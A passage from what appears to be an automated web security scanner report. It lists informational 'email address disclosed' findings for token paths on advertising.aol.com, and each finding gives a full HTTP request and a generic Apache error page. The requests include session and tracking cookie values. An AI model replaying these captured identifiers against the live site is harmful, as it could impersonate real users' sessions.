Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:12:43 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.13. http://advertising.aol.com/token/0/3/295357155/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/295357155/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/0/3/295357155/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:47:24 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.14. http://advertising.aol.com/token/1/1/819977518/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/1/819977518/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/1/1/819977518/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:13:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:13:23 GMT
ntCoent-Length: 682
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.15. http://advertising.aol.com/token/1/3/1696897902/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/1696897902/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/1/3/1696897902/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:47:01 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.16. http://advertising.aol.com/token/2/2/1032347115/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/2/1032347115/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/2/2/1032347115/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:13:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:13:17 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.17. http://advertising.aol.com/token/2/3/1397978719/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/1397978719/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/2/3/1397978719/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:37 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:47:37 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.18. http://advertising.aol.com/token/3/1/8239370/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/1/8239370/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/3/1/8239370/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:14:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:14:03 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.19. http://advertising.aol.com/token/3/3/1557169105/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/1557169105/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/3/3/1557169105/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:47:18 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.20. http://advertising.aol.com/token/4/1/1128450710/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/1/1128450710/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/4/1/1128450710/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:13:38 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:13:38 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.21. http://advertising.aol.com/token/4/3/708534695/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/708534695/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/4/3/708534695/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:46:57 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.22. http://advertising.aol.com/token/5/2/1348442932/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/2/1348442932/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/5/2/1348442932/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:13:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:13:30 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.23. http://advertising.aol.com/token/5/3/1649521156/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1649521156/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/5/3/1649521156/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:46:51 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.24. http://advertising.aol.com/token/6/1/1581270199/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/1/1581270199/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/6/1/1581270199/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:13:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:13:57 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.25. http://advertising.aol.com/token/6/3/882857095/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/882857095/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/6/3/882857095/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:46:49 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.26. http://advertising.aol.com/token/7/1/52531776/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/1/52531776/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/7/1/52531776/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:14:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:14:06 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.27. http://advertising.aol.com/token/7/3/1777313403/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/1777313403/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/7/3/1777313403/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:47:36 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.28. http://advertising.aol.com/token/8/1/585997419/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/1/585997419/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/8/1/585997419/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:14:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 17:14:02 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
